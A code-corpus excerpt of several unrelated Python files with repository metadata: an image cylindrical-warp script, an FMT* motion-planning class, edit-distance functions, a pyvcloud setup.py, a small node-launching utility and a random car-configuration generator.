| 316
| 0.217033
|
62a840352bdaa921e3b37484cc7f2c625c055007
| 1,989
|
py
|
Python
|
scripts/cylindrical.py
|
NunchakusLei/Panoramas-with-image-stitching
|
a0c9a292d53f22e4de82fe337935c946064fe519
|
[
"Apache-2.0"
] | 3
|
2020-12-24T19:02:19.000Z
|
2021-07-17T07:48:54.000Z
|
scripts/cylindrical.py
|
NunchakusLei/Panoramas-with-image-stitching
|
a0c9a292d53f22e4de82fe337935c946064fe519
|
[
"Apache-2.0"
] | null | null | null |
scripts/cylindrical.py
|
NunchakusLei/Panoramas-with-image-stitching
|
a0c9a292d53f22e4de82fe337935c946064fe519
|
[
"Apache-2.0"
] | null | null | null |
# The source of this script is from:
# https://github.com/TejasNaikk/Image-Alignment-and-Panoramas/blob/master/main.py
import cv2
import numpy as np
import math
'''
Warp an image from cartesian coordinates (x, y) into cylindrical coordinates (theta, h)
Returns: (image, mask)
Mask is [0,255], and has 255s wherever the cylindrical images has a valid value.
Masks are useful for stitching
Usage example:
im = cv2.imread("myimage.jpg",0) #grayscale
h,w = im.shape
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
'''
def cylindricalWarpImage(img1, K, savefig=False):
f = K[0,0]
im_h,im_w = img1.shape[:2]
# go inverse from cylindrical coord to the image
# (this way there are no gaps)
cyl = np.zeros_like(img1)
cyl_mask = np.zeros((im_h,im_w), dtype=img1.dtype)
cyl_h, cyl_w = cyl.shape[:2]
x_c = float(cyl_w) / 2.0
y_c = float(cyl_h) / 2.0
for x_cyl in np.arange(0,cyl_w):
for y_cyl in np.arange(0,cyl_h):
theta = (x_cyl - x_c) / f
h = (y_cyl - y_c) / f
X = np.array([math.sin(theta), h, math.cos(theta)])
X = np.dot(K,X)
x_im = X[0] / X[2]
if x_im < 0 or x_im >= im_w:
continue
y_im = X[1] / X[2]
if y_im < 0 or y_im >= im_h:
continue
cyl[int(y_cyl),int(x_cyl)] = img1[int(y_im),int(x_im)]
cyl_mask[int(y_cyl),int(x_cyl)] = 255
if savefig:
plt.imshow(cyl, cmap='gray')
plt.savefig("cyl.png",bbox_inches='tight')
return (cyl, cyl_mask)
if __name__ == "__main__":
im = cv2.imread('../data/example-data/flower/1.jpg')
h,w = im.shape[:2]
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
cv2.imshow("test", imcyl[0])
cv2.waitKey()
cv2.destroyAllWindows()
| 29.25
| 87
| 0.581699
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 739
| 0.371543
|
62a90788c7716583df977b2015db0ceb313c24a8
| 7,490
|
py
|
Python
|
fmt/pythonfmt/fmt.py
|
KarlRong/Safe-RL-for-Driving
|
67484911ca8ad9f1476e96043c379c01cd5ced8c
|
[
"Apache-2.0"
] | null | null | null |
fmt/pythonfmt/fmt.py
|
KarlRong/Safe-RL-for-Driving
|
67484911ca8ad9f1476e96043c379c01cd5ced8c
|
[
"Apache-2.0"
] | null | null | null |
fmt/pythonfmt/fmt.py
|
KarlRong/Safe-RL-for-Driving
|
67484911ca8ad9f1476e96043c379c01cd5ced8c
|
[
"Apache-2.0"
] | null | null | null |
import math
import random
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from fmt.pythonfmt.doubleintegrator import filter_reachable, gen_trajectory, show_trajectory
from fmt.pythonfmt.world import World
def dist2(p, q):
return math.sqrt((p[1] - q[1]) ** 2 + (p[2] - q[2]) ** 2)
# FMTree class
class FMTree:
# s_init::Vec4f
# s_goal::Vec4f
# N #number of samples
# Pset::Vector{Vec4f} # Point set
# cost::Vector{Float64} #cost
# time::Vector{Float64} #optimal time to connect one node to its parent node
# parent::Vector{Int64} #parent node
# bool_unvisit::BitVector #logical value for Vunvisit
# bool_open::BitVector #logical value for Open
# bool_closed::BitVector #logical value for Closed
# world::World # simulation world config
# itr::Int64 # iteration num
def __init__(self, s_init, s_goal, N, world):
# constructer: sampling valid point from the configurationspace
print("initializing fmt ...")
self.s_init = s_init
self.s_goal = s_goal
self.N = N
self.world = world
self.Pset = np.zeros((N, 4))
self.Pset[0, :] = np.array(s_init)
def myrn(min, max):
return min + (max - min) * random.random()
# 采样N个点
n = 1
while True:
num_ran = 2*N
rp = np.empty((4, num_ran))
rp[0, :] = np.random.default_rng().uniform(self.world.x_min[0], self.world.x_max[0], num_ran)
rp[1, :] = np.random.default_rng().uniform(self.world.x_min[1], self.world.x_max[1], num_ran)
rp[2, :] = np.random.default_rng().uniform(self.world.v_min[0], self.world.v_max[0], num_ran)
rp[3, :] = np.random.default_rng().uniform(self.world.v_min[1], self.world.v_max[1], num_ran)
# p = np.array([myrn(world.x_min[0], world.x_max[0]),
# myrn(world.x_min[1], world.x_max[1]),
# myrn(world.v_min[0], world.v_max[0]),
# myrn(world.v_min[1], world.v_max[1])])
for i_rp in range(0, num_ran):
if self.world.isValid(rp[:, i_rp]):
self.Pset[n, :] = rp[:, i_rp]
n = n + 1
if n == N-1:
break
if n == N-1:
break
self.Pset[-1, :] = np.array(s_goal) # inply idx_goal = N [last] ? 修改為最後一個是終點
self.cost = np.zeros(N)
self.time = np.zeros(N)
self.parent = np.zeros(N, dtype=int)
self.bool_unvisit = np.ones(N, dtype=np.bool_)
self.bool_unvisit[0] = False
self.bool_closed = np.zeros(N, dtype=np.bool_)
self.bool_open = np.zeros(N, dtype=np.bool_)
self.bool_open[0] = True
self.itr = 0
print("finish initializing")
# new(s_init, s_goal,
# N, Pset, cost, time, parent, bool_unvisit, bool_open, bool_closed, world, 0)
def show(self, ax):
print("drawing...")
# 先画障碍物
N = len(self.Pset)
mat = np.zeros((2, N))
for idx in range(0, N):
mat[:, idx] = self.Pset[idx, 0:2]
idxset_open = np.nonzero(self.bool_open)[0]
idxset_closed = np.nonzero(self.bool_closed)[0]
idxset_unvisit = np.nonzero(self.bool_unvisit)[0]
# idxset_tree = setdiff(union(idxset_open, idxset_closed), [1])
idxset_tree = np.concatenate((idxset_closed, idxset_open)) # 没有和原来一样去除 id 1
# 起点,重点,open, close
ax.scatter(mat[0, 0], mat[1, 0], c='blue', s=20, zorder=100)
ax.scatter(mat[0, -1], mat[1, -1], c='blue', s=20, zorder=101)
ax.scatter(mat[0, idxset_open], mat[1, idxset_open], c='orange', s=5)
ax.scatter(mat[0, idxset_closed], mat[1, idxset_closed], c='red', s=5)
# ax.scatter(mat[0, idxset_unvisit], mat[1, idxset_unvisit], c='khaki', s=2)
for idx in idxset_tree:
s0 = self.Pset[self.parent[idx]]
s1 = self.Pset[idx]
tau = self.time[idx]
show_trajectory(s0, s1, tau, N_split=5, ax=ax)
# 起点重点画了第二次?
# ax.scatter(mat[0, 1], mat[1, 1], c='blue', s=20, zorder=100)
# ax.scatter(mat[0, -1], mat[1, -1], c='blue', s=20, zorder=101)
# plt.xlim(this.world.x_min[1]-0.05, this.world.x_max[1]+0.05)
# plt.ylim(this.world.x_min[2]-0.05, this.world.x_max[2]+0.05)
print("finish drawing")
def solve(self, ax=None, show=False, save=False):
# keep extending the node until the tree reaches the goal
print("please set with_savefig=false if you want to measure the computation time")
print("start solving")
while True:
if not self.extend(): # 擴展失敗
break
# if ((self.itr < 100) and (self.itr % 20 == 1)) or (self.itr % 200 == 1):
if self.itr % 40 == 1:
print("itr: ", self.itr)
if ax and show:
# close()
self.show(ax)
plt.pause(1)
if ax and save:
plt.savefig("./fig/" + str(self.itr) + ".png")
# 这里需要通过传递fig解决
if not self.bool_unvisit[-1]:
break
# 無法連接到終點的情況處理待定
idx = -1
idx_solution = [idx]
while True:
idx = self.parent[idx]
idx_solution.append(idx)
if idx == 0:
break
print("finish solving")
return np.array(idx_solution)
def extend(self):
# extend node
self.itr += 1
r = 1.0 # 这是什么参数?
# 此處數據結構可以優化, idxset_open和idxset_unvisit不用每次檢索
idxset_open = np.nonzero(self.bool_open)[0] #這裡莫名返回一個tuple,需要取第一個
if idxset_open.size == 0: #無法再繼續擴展
return False
idxset_unvisit = np.nonzero(self.bool_unvisit)[0]
idx_lowest = idxset_open[np.argmin(self.cost[idxset_open])]
# idx_lowest = idxset_open[findmin(this.cost[idxset_open])[2]]
s_c = self.Pset[idx_lowest, :]
idxset_near, _, _ = filter_reachable(self.Pset, idxset_unvisit,
self.Pset[idx_lowest], r, "F")
for idx_near in idxset_near:
idxset_cand, distset_cand, timeset_cand = filter_reachable(self.Pset, idxset_open,
self.Pset[idx_near], r, "B")
if len(idxset_cand) == 0:
return
idx_costmin = np.argmin(self.cost[idxset_cand] + distset_cand)
cost_new = self.cost[idxset_cand[idx_costmin]] + distset_cand[idx_costmin]
# cost_new, idx_costmin = findmin(this.cost[idxset_cand] + distset_cand)
# optimal time for new connection
time_new = timeset_cand[idx_costmin]
idx_parent = idxset_cand[idx_costmin]
waypoints = gen_trajectory(self.Pset[idx_parent], self.Pset[idx_near], time_new, 10)
if self.world.isValid(waypoints):
self.bool_unvisit[idx_near] = False
self.bool_open[idx_near] = True
self.cost[idx_near] = cost_new
self.time[idx_near] = time_new
self.parent[idx_near] = idx_parent
# print("nonzero cost idx: ", np.nonzero(self.cost))
self.bool_open[idx_lowest] = False
self.bool_closed[idx_lowest] = True
return True
| 40.486486
| 105
| 0.554072
| 7,392
| 0.956769
| 0
| 0
| 0
| 0
| 0
| 0
| 2,284
| 0.295625
|
62aaf966c075e395977fecf28d9050755afb7dda
| 2,338
|
py
|
Python
|
algorithms/edit_distance.py
|
costincaraivan/cs-refresher
|
008fdb2af661310c65f656f017ec34e5df004424
|
[
"MIT"
] | 1
|
2018-06-12T12:00:33.000Z
|
2018-06-12T12:00:33.000Z
|
algorithms/edit_distance.py
|
costincaraivan/cs-refresher
|
008fdb2af661310c65f656f017ec34e5df004424
|
[
"MIT"
] | null | null | null |
algorithms/edit_distance.py
|
costincaraivan/cs-refresher
|
008fdb2af661310c65f656f017ec34e5df004424
|
[
"MIT"
] | null | null | null |
# import unittest
import logging
from timeit import timeit
logging.basicConfig(level=logging.INFO)
def memoize(function):
cache = {}
def memo(*args):
if args not in cache:
cache[args] = function(*args)
return cache[args]
return memo
@memoize
def edit_distance_recursive(source, target):
if source == "":
return len(target)
if target == "":
return len(source)
if source[-1] == target[-1]:
cost = 0
else:
cost = 1
return min(
edit_distance_recursive(source[:-1], target) + 1,
edit_distance_recursive(source, target[:-1]) + 1,
edit_distance_recursive(source[:-1], target[:-1]) + cost
)
logging.info(edit_distance_recursive("intention", "execution"))
logging.info(edit_distance_recursive("jackrabbits", "jackhammer"))
logging.info(edit_distance_recursive("ie", "e"))
def edit_distance_iterative(source, target):
rows = len(source)
columns = len(target)
if rows == 0:
return columns
if columns == 0:
return rows
# Initalize 2D array.
edit_distances = [[0] * columns for i in range(rows)]
for row in range(rows):
edit_distances[row][0] = row
for column in range(columns):
edit_distances[0][column] = column
for column in range(1, columns):
for row in range(1, rows):
if source[row - 1] == target[column - 1]:
cost = 0
else:
cost = 1
edit_distances[row][column] = min(
edit_distances[row - 1][column] + 1,
edit_distances[row][column - 1] + 1,
edit_distances[row - 1][column - 1] + cost
)
# for row in range(rows):
# logging.info(edit_distances[row])
return edit_distances[row][column]
logging.info(edit_distance_iterative("intention", "execution"))
logging.info(edit_distance_iterative("jackrabbits", "jackhammer"))
logging.info(edit_distance_iterative("ie", "e"))
logging.info(timeit('edit_distance_recursive("intention", "execution")',
setup='from __main__ import edit_distance_recursive', number=100))
logging.info(timeit('edit_distance_iterative("intention", "execution")',
setup='from __main__ import edit_distance_iterative', number=100))
| 27.505882
| 86
| 0.618477
| 0
| 0
| 0
| 0
| 431
| 0.184346
| 0
| 0
| 407
| 0.17408
|
62ab97280947669585b79c2c2795dd161b100377
| 2,365
|
py
|
Python
|
hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 2
|
2015-06-15T02:16:33.000Z
|
2022-02-23T07:10:38.000Z
|
hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 7
|
2016-05-13T06:39:45.000Z
|
2016-05-20T02:55:31.000Z
|
hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 4
|
2015-11-02T04:02:50.000Z
|
2021-05-13T17:06:00.000Z
|
# VMware vCloud Python SDK
# Copyright (c) 2014 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='pyvcloud',
version='11',
description='VMware vCloud Python SDK',
long_description=read('README.rst'),
url='https://github.com/vmware/pyvcloud',
author='VMware, Inc.',
author_email='pgomez@vmware.com',
packages=find_packages(),
install_requires=required,
license='License :: OSI Approved :: Apache Software License',
classifiers=[
'Development Status :: 1 - Planning',
'License :: OSI Approved :: Apache Software License',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'Intended Audience :: Developers',
'Environment :: No Input/Output (Daemon)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Distributed Computing',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
],
keywords='pyvcloud vcloud vcloudair vmware',
platforms=['Windows', 'Linux', 'Solaris', 'Mac OS-X', 'Unix'],
test_suite='tests',
tests_require=[],
zip_safe=True
)
| 37.539683
| 74
| 0.659197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,633
| 0.690486
|
62ac5880cfcb73a7f5f41808ba14ed348ca4e208
| 607
|
py
|
Python
|
net_utils.py
|
mfatihaktas/edge-load-balance
|
b866ca47ba37a605eeba05658b1d302f6855a23f
|
[
"MIT"
] | null | null | null |
net_utils.py
|
mfatihaktas/edge-load-balance
|
b866ca47ba37a605eeba05658b1d302f6855a23f
|
[
"MIT"
] | null | null | null |
net_utils.py
|
mfatihaktas/edge-load-balance
|
b866ca47ba37a605eeba05658b1d302f6855a23f
|
[
"MIT"
] | null | null | null |
from debug_utils import *
def run(node_l, cmd_l):
popens = {}
for i, n in enumerate(node_l):
popens[n] = n.popen(cmd_l[i])
log(DEBUG, "Started {}".format(n))
def run_masters(m_l):
run(m_l, ['./run.sh m {}'.format(i) for i in range(len(m_l))])
log(DEBUG, "done")
def run_workers(w_l):
run(w_l, ['./run.sh w {}'.format(i) for i in range(len(w_l))])
log(DEBUG, "done")
def run_dashboard_server(d):
run([d], ['./run.sh d'])
log(DEBUG, "done")
# TODO: does not work
def pkill():
os.system('pkill -f client.py; pkill -f master.py; pkill -f worker.py; pkill -f dashboard.py')
log(DEBUG, "done")
| 24.28
| 95
| 0.634267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.299835
|
62ac8d841db4303175fa7656df2488f0b321c7c1
| 2,086
|
py
|
Python
|
auto.py
|
fabiaant/Automation-car-generator
|
aa57f1a69e4c4b1abf123b6bb88863862d43c4eb
|
[
"MIT"
] | 1
|
2018-10-05T15:12:08.000Z
|
2018-10-05T15:12:08.000Z
|
auto.py
|
fabiaant/Automation-car-generator
|
aa57f1a69e4c4b1abf123b6bb88863862d43c4eb
|
[
"MIT"
] | null | null | null |
auto.py
|
fabiaant/Automation-car-generator
|
aa57f1a69e4c4b1abf123b6bb88863862d43c4eb
|
[
"MIT"
] | 1
|
2021-08-30T01:18:36.000Z
|
2021-08-30T01:18:36.000Z
|
import random
options = {
"year": {
"start": 1946,
"end": 2020
},
"body": ["Sedan", "Wagon", "Hatchback", "Coupe", "SUV", "Utility", "MPV",
"Convertible", "Van"],
"engine_location": ["front", "mid", "rear"],
"engine_mounting": ["transverse", "longitudinal"],
"drive": ["FWD", "RWD", "AWD", "4x4"],
"engine": {
"aspiration": ["naturally aspirated", "turbocharged"],
"layout": [
{
"Inline-": [3, 4, 5, 6]
},
{
"60° V": [6, 8, 12]
},
{
"90° V": [6, 8, 10]
},
{
"Boxer-": [4, 6]
}
]
}
}
def choose_year():
years = options["year"]
inclusive_range = range(years["start"], years["end"] + 1)
return random.choice(inclusive_range)
def choose_body():
return random.choice(options["body"])
def choose_engine_location():
return random.choice(options["engine_location"])
def choose_engine_mounting():
return random.choice(options["engine_mounting"])
def choose_drive():
return random.choice(options["drive"])
def choose_engine():
aspiration = random.choice(options["engine"]["aspiration"])
style = random.choice(options["engine"]["layout"])
style_name = list(style.keys())[0]
cyl_count = random.choice(style[style_name])
engine_string = aspiration + " " + style_name + str(cyl_count)
return engine_string
# Make it a class for the fuck of it lol
class Car:
def __init__(self):
self.year = choose_year()
self.engine_location = choose_engine_location()
self.engine_mounting = choose_engine_mounting()
self.drive = choose_drive()
self.engine = choose_engine()
self.body = choose_body()
def describe(self):
return f"A {self.year} {self.drive} {self.body} with a {self.engine_location}-"\
f"{self.engine_mounting} mounted {self.engine}!"
car = Car()
print("Your next car will be:")
print(car.describe())
input("Press enter to close")
| 27.813333
| 88
| 0.57047
| 459
| 0.219828
| 0
| 0
| 0
| 0
| 0
| 0
| 604
| 0.289272
|